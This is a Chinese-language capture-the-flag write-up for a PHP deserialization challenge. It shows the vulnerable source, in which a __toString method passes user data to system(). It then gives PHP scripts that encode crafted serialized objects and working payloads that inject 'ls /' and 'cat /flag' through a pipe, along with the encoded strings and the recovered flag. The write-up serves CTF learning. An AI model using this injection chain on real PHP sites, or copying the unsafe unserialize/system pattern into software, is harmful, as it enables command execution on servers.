当前位置：首页 > news >正文

[web]-反序列化-base64

news 2025/6/29 8:57:00

看到源码

 <?php 
error_reporting(0);
class A
{public $contents = "hello ctfer";function __toString(){if ((preg_match('/^[a-z]/i',$this->contents))) {system("echo $this->contents");return '111';}else{return "...";}}
}function decode_data($data){$data = base64_decode($data);$res = '';for($i=0; $i< strlen($data); $i++){$res .= chr(ord($data[$i]) + $i);}return $res;
}if (isset($_GET['data'])) {$data = $_GET['data'];$data = decode_data($data);echo unserialize($data);
}else{highlight_file(__FILE__);
}?>

起点和终点都是_toString(),类被当作字符串使用，这里很简单，但是传入的参数经过解密，首先是需要base64解码，然后每位上加上自己的序号。反过来先构造自己的类，然后每位减去序列号，最后base64编码

<?php
class A
{public $contents = "ls /";
}$a=new A();
$data = serialize($a);
echo $data;$res='';
for($i=0; $i< strlen($data); $i++){$res .= chr(ord($data[$i]) - $i);
}$data = base64_encode($res);
echo $data;
?>

输入后提示：ls / 111,说明执行了。

但是只执行了echo命令，我们用管道符来构造命令

<?php
class A
{public $contents = "ls | ls /";
}$a=new A();
$data= serialize($a);$res='';
for($i=0; $i< strlen($data); $i++){$res .= chr(ord($data[$i]) - $i);
}$data = base64_encode($res);
echo $data;
?>TzkvNx48HDMpMXFoLissE1NeXGFRWV5cCiJZHx0dBE1T/1r9SE76CPoSUw==

输入后，可以看到目录和flag，读取flag就可以了。

<?php
class A
{public $contents = "ls | cat /flag";
}$a=new A();
$data= serialize($a);$res='';
for($i=0; $i< strlen($data); $i++){$res .= chr(ord($data[$i]) - $i);
}$data = base64_encode($res);
echo $data;
?>TzkvNx48HDMpMXFoLissE1NeXGFRWV5cCiJZHxUXHANMUv5Z/D47TfgGPEE1OvQMTQ==

flag:e7d6ee31352bf6bf9cc227ac25cdb3f1

查看全文

http://www.lryc.cn/news/404730.html